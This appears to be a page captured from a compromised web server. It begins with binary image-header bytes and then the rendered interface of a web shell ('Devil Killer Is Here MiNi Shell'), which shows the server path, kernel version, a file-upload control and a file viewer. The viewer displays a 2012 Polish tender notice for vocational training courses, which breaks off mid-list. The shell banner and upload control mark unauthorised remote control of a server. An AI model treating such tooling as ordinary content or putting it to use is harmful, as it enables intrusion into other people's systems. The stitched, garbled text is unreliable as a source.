JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120615/130753-N-2012.html

<p class="kh_header"><b>Radzyń Chełmiński: Usługi szkoleniowe dla osób zakwalifikowanych do udziału w projekcie systemowym
Aktywna integracja w Radzyniu Chełmińskim w zakresie podnoszącym kwalifikacje zawodowe w tym również w realizacja Programu Aktywności Lokalnej (PAL).</b><br>
<b>Numer ogłoszenia: 130753 - 2012; data zamieszczenia: 15.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej w Radzyniu Chełmińskim , pl. Tow. Jaszczurczego 9, 87-220 Radzyń Chełmiński, woj. kujawsko-pomorskie, tel. 56 68 86 001 wew. 37, faks 56 6886 001 wew. 61.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: miejsko-gminny ośrodek pomocy społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe dla osób zakwalifikowanych do udziału w projekcie systemowym
Aktywna integracja w Radzyniu Chełmińskim w zakresie podnoszącym kwalifikacje zawodowe w tym również w realizacja Programu Aktywności Lokalnej (PAL)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: usługi w zakresie szkoleń dla 27 osób zakwalifikowanych do udziału w projekcie systemowym Aktywna integracja w Radzyniu Chełmińskim oraz usługi w zakresie realizacji Programu Aktywności Lokalnej (PAL) dla 8 osób zakwalifikowanych do udziału w projekcie systemowym Aktywna integracja  w Radzyniu Chełmińskim.
1 część zamówienia - Usługi szkoleniowe dla osób zakwalifikowanych do udziału w projekcie systemowym Aktywna integracja w Radzyniu Chełmińskim składa się z następujących kursów:
1.1 Kurs Spawanie metodą MAG; 135h,w tym 120h praktycznych dla 5 mężczyzn, Program szkolenia powinien być zgodny z wytycznymi Instytutu Spawalnictwa z Gliwic. Kurs musi się zakończyć egzaminem państwowym przed Egzaminatorem z Instytutu Spawalnictwa z Gliwic. Rodzaj dokumentów wydanych po zakończeniu kursu i pozytywnym zaliczeniu egzaminu: Książka Spawacza i Certyfikat, wystawione przez Instytut Spawalnictwa z Gliwic.
Wykonawca musi posiadać aktualny ATEST Instytutu Spawalnictwa z Gliwic na prowadzenie szkoleń dla spawaczy.
1.2 Kurs Kierowca wózków jezdniowych wraz z  Obsługą stacji LPG dla 2 osób  
Liczba 67 godz. zajęć wózki jezdniowe (teoria i praktyka w tym 47 godzin zajęć teoretycznych, 1 godz. zajęć teoretycznych odpowiada godzinie lekcyjnej = 45 minut-1 godz. zajęć praktycznych odpowiada godzinie zegarowej = 60 minut) Liczba godzin 30 godz. (teoria i praktyka)  obsługa stacji LPG.
Kurs Kierowca wózków jezdniowych powinien być przeprowadzony na podstawie programu szkolenia zatwierdzonego przez Ośrodek Doskonalenia Kadr z Mysłowic.
Kurs Obsługa stacji LPG powinien być przeprowadzony na podstawie programu szkolenia zatwierdzonego przez Transportowy Dozór Techniczny.
Rodzaj dokumentów wydanych po zakończeniu szkolenia Kierowca wózków jezdniowych: Zaświadczenie o ukończeniu kursu zgodne ze wzorem Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
Rodzaj dokumentów wydanych po zakończeniu szkolenia Obsługa stacji LPG: Zaświadczenie kwalifikacyjne wystawione przez Transportowy Dozór Techniczny.
1.3 Kurs: Operator żurawi wieżowych; 100h, w tym 60 prakt. dla 2 mężczyzn,
Kurs powinien być prowadzony na podstawie programu zatwierdzonego przez Urząd Dozoru Technicznego. Rodzaj dokumentów wydanych po zakończeniu szkolenia: Zaświadczenie kwalifikacyjne wystawione przez Urząd Dozoru Technicznego.
1.4 Kurs: Montażysta rusztowań budowlano-montażowych metalowych; 80h dla 2 mężczyzn. Kurs powinien być prowadzony na podstawie programu opracowanego przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego z Warszawy, zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r., w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, poz. 1263). Wykonawca musi posiadać aktualne Potwierdzenie z Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego z Warszawy na prowadzenie szkoleń w wyżej wymienionym zakresie.
1.5 Kurs profesjonalny sprzedawca (łącznie 160 godz. w tym 80 godz. praktyka ), z modułami podstawowych zagadnień higieny, obsługą kas i urządzeń fiskalnych z obsługą komputera i bezpieczeństwo i higiena pracy  - 5 kobiet
Liczba godzin łącznie 160  (teoria i praktyka). 
Kurs powinien obejmować następujące zagadnienia: skuteczne techniki sprzedaży, standardy obsługi klienta, negocjacje handlowe. Praktyki zawodowe powinny odbywać w odpowiednich miejscach dla tego rodzaju kursu. 
Program szkolenia powinien być zgodny z przepisami obowiązującego prawa i zatwierdzony przez Zamawiającego. 
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne ze wzorem Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
1.6 Kurs Opiekunka osób starszych: moduł teoretyczny i praktyczny w instytucjach pomocy społecznej  np. DPS.  
Liczba  godzin 180 godz.  - 5 osób w tym zajęcia teoretyczne 120 godzin, zajęcia praktyczne 60 godzin, przy czym 1 godz. zajęć teoretycznych odpowiada godzinie lekcyjnej = 45 minut, 1 godz. zajęć praktycznych odpowiada godzinie zegarowej = 60 minut. 
-Kurs zrealizowany zostanie zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. (Dz. U. 2006 r. Nr 31, poz. 216) w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych i zakończony wydaniem zaświadczenia zgodnego ze wzorem zawartym w niniejszym rozporządzeniu. Wykonawca zapewni i przeprowadzi stosowne badania lekarskie potwierdzające brak przeciwwskazań do odbycia kursu i późniejszego wykonywania zawodu.
- W ramach zajęć teoretycznych wykonawca zapewni każdemu kursantowi materiały szkoleniowe na własność obejmujące zagadnienia danego kursu w tym teczka A4, notatnik, długopis, ołówek, skrypt lub książka zgodna ze specyfikacja danego kursu.
- Wykonawca zapewni uczestnikom kursu na własność odzież ochronną oraz środki higieny (fartuch, rękawiczki jednorazowe, środki czystości w tym mydło, ręcznik, proszek).
- Program szkolenia powinien zawierać m.in. następujące zagadnienia: psychologiczne i pedagogiczne uwarunkowania pracy z osobami starszymi, chorymi i niepełnosprawnymi, wykonywanie czynności higienicznych przy podopiecznym, wspieranie biologicznych funkcji życiowych podopiecznego, udzielanie pierwszej pomocy przedmedycznej (w wymiarze 16 godzin zegarowych), organizowanie czasu podopiecznemu, praktyka w placówce opiekuńczej w wymiarze, 60 godzin. 
-Pozostałe warunki, które Zamawiający musi zaakceptować chcąc przystąpić do udzielenia zamówienia zawarte są we wzorze umowy.
1.7 Kurs Manicure i paznokci  16 godz. i 40 godz. praktyki oraz kurs Wizaż i autoprezentacja 40 godz. dla 2 kobiet. Kurs zrealizowany zostanie zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. (Dz. U. 2006 r. Nr 31, poz. 216) w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych i zakończony wydaniem zaświadczenia zgodnego ze wzorem zawartym w niniejszym rozporządzeniu.
1.8  Kurs; Kadry i płace-księgowość;, kadry- 60h,księgowość 100h dla 2 Kobiet;
-Kurs zrealizowany zostanie zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. (Dz. U. 2006 r. Nr 31, poz. 216) w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych i zakończony wydaniem zaświadczenia zgodnego ze wzorem zawartym w niniejszym rozporządzeniu.
1.9 Kurs: Florystyka-bukieciarstwo; 40h teorii i 80h praktyki dla 2 Kobiet.
- Celem kursu jest teoretyczne i praktyczne przygotowanie osób szkolonych do pracy 
w zawodzie zgodnym z tematyką kursu.
- Kurs zrealizowany zostanie zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. (Dz. U. 2006 r. Nr 31, poz. 216) w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych i zakończony wydaniem zaświadczenia zgodnego ze wzorem zawartym w niniejszym rozporządzeniu. W ramach zajęć teoretycznych wykonawca zapewni każdemu kursantowi materiały szkoleniowe na własność obejmujące zagadnienia danego kursu w tym teczka A4, notatnik, długopis, ołówek, skrypt lub książka zgodna ze specyfikacja danego kursu.
- Poprzez zajęcia praktyczne Zamawiający rozumie pracę z żywymi  kwiatami, ćwiczenia i praktykę przy wykonywaniu różnych kompozycji. Wykonane kompozycje kwiatowe przechodzą na własność Zamawiającego. 
- Zamawiający dopuszcza  max. 16 godzin  zajęć praktycznych w kwiaciarniach. W jednej kwiaciarni max 2 uczestników kursu.
- Wykonawca zapewni materiały i narzędzia do prowadzenia zajęć praktycznych (naczynia, pojemniki, kosze, wstążki, rafia, stożki, siatki, druty, nici, taśmy, nożyce, cęgi i sekatory, klej, pistolet do kleju, spryskiwacze, preparaty przedłużające trwałość kwiatów, papier, folie ozdobne, kora, kwiaty cięte, kwiaty sztuczne, elementy ozdobne) w takiej ilości, aby na każdy uczestnik kursu mógł samodzielnie wykonywać prace. 
- Pozostałe warunki, które Zamawiający musi zaakceptować chcąc przystąpić do udzielenia zamówienia zawarte są we wzorze umowy.
1.10 Zajęcia z doradcą zawodowym  -  27  osób
Liczba godzin 30 h na jednego uczestnika -25 godz. Zajęć grupowych  i 5 godz. indywidualnych  dla każdego uczestnika  w zakresie aktywnego poszukiwania pracy.
Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne ze wzorem Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216). 
1.11 ) Trening kompetencji i umiejętności społecznych zajęcia z psychologiem-  27  osób
Liczna godzin  30 h na jednego uczestnika -25 godz. zajęć grupowych  i 5 godz. indywidualnych  dla każdego uczestnika.  
Wydawane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne ze wzorem Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216). 
2 część zamówienia - Usługi w zakresie realizacji Programu Aktywności Lokalnej (PAL) dla osób zakwalifikowanych do udziału w projekcie systemowym Aktywna integracja w Radzyniu Chełmińskim, cykl działań dla 8 kobiet oraz ich rodzin/otoczenia - maksymalna liczba dzieci biorących udział we wszystkich spotkaniach (nie tylko wyjazdowych) wynosi 19. Podczas zajęć należy zapewnić dzieciom opiekę i catering.
 Program Aktywności Lokalnej składa się z:
a)  Asertywność treningi kompetencji i umiejętności społecznych,  wiadomości na temat zachowań asertywnych, rozpoznawanie swego zachowania, mechanizmów nacisku grupowego. W trakcie spotkania dzieci będą uczestniczyły w zajęciach pod okiem opiekunki. (min 8 godz. zajęć grupowych)
b) Efektywne radzenie sobie ze stresem - rozumienie zjawisko stresu psychicznego i jego wpływu na zdrowie człowieka, poznanie własnego stylu reagowania na stres, zdolność do rozpoznawania źródeł stresu, rozwój umiejętności radzenia sobie ze stresem (dzieci będą brały udział w zajęciach) (min. 8 godz. zajęć grupowych)
c) Radzenie sobie ze złością - źródła złości,  konstruktywne sposoby radzenia sobie ze złością (dla dzieci zajęcia) (min.  8 godz. zajęć grupowych) 
d) Autoprezentacja umiejętność oceny własnych możliwości i kompetencji oraz umiejętność korzystnej autoprezentacji.  (min. 8 godz. zajęć grupowych) 
e) Warsztat: Zdrowe życie (min. 10 godz., zajęć grupowych, wyjazdowy); 
f) Sesja Jak być rodzicem, jak radzić sobie z wychowaniem dzieci, z zakresu kompetencji rodzicielskich (wyjazd, min. 10 godz. zajęć; pedagog-terapeuta - zajęcia grupowe), obserwacja interakcji między rodzicami i dziećmi, porady - poradnictwo i wsparcie indywidualne oraz grupowe  w zakresie podniesienia kompetencji życiowych i umiejętności społeczno-zawodowych.
g)  warsztat Aktywne formy poszukiwania pracy (min. 6 godz., trener pracy. zajęcia grupowe)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia wykonawca przedstawi wykaz co najmniej 3 kursów/szkoleń w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat, wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie (min. po jednym kursie-szkoleniu z niżej wymienionego zakresu). Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że zostały wykonane lub są wykonywane należycie usługi dot. przedmiotu zamówienia obejmujące przynajmniej jedno zamówienie polegające na wykonaniu szkoleń/ kursów niżej wymienionych:  a) kurs profesjonalny sprzedawca z modułami podstawowych zagadnień higieny, obsługą kas i urządzeń fiskalnych, b)  kurs manicure paznokci i wizaż, c) kurs  Kadry i płace-księgowość  d) kurs florystyka i bukieciarstwo e) operator żurawia wieżowego  f) kurs montażysta rusztowań  g ) kurs opiekun osób starszych, dzieci i niepełnosprawnych, h) kurs Spawanie metodą MAG i) kurs kierowca wózków jezdniowych j)  zajęcia z doradcą zawodowym, k) trening kompetencji i umiejętności społecznych, zajęcia z psychologiem.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki w oparciu o złożone do oferty  oświadczenia i dokumenty,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia: Wykonawca
przedstawi wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacji o podstawie do dysponowania tymi osobami. Osoby podane wyżej wymienionym wykazie winny posiadać wykształcenie kierunkowe lub zbieżne z przedmiotem zamówienia, w tym również winny się znaleźć również osoby posiadające wykształcenie kierunkowe w specjalności doradztwo zawodowe (dot. obydwu części). Ponadto wykonawcy składający oferty na pierwszą część zamówienia winni wskazać w wykazie psychologa (1.11 trening kompetencji i umiejętności społecznych), zaś wykonawcy składający ofertę na drugą część zamówienia winni wskazać w wykazie pedagoga-terapeutę (sesja: Jak być rodzicem), jak radzić sobie z wychowaniem dzieci, z zakresu kompetencji rodzicielskich. Osoby wymienione w wykazie powinny posiadać przygotowanie pedagogiczne do prowadzenia kursów oraz doświadczenie zawodowe w zakresie specyfiki danego kursu-szkolenia.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki w oparciu o złożone do oferty  oświadczenia i dokumenty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnianie tego warunku Zamawiający uzna posiadanie przez Wykonawcę opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki w oparciu o złożone do oferty  oświadczenia i dokumenty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

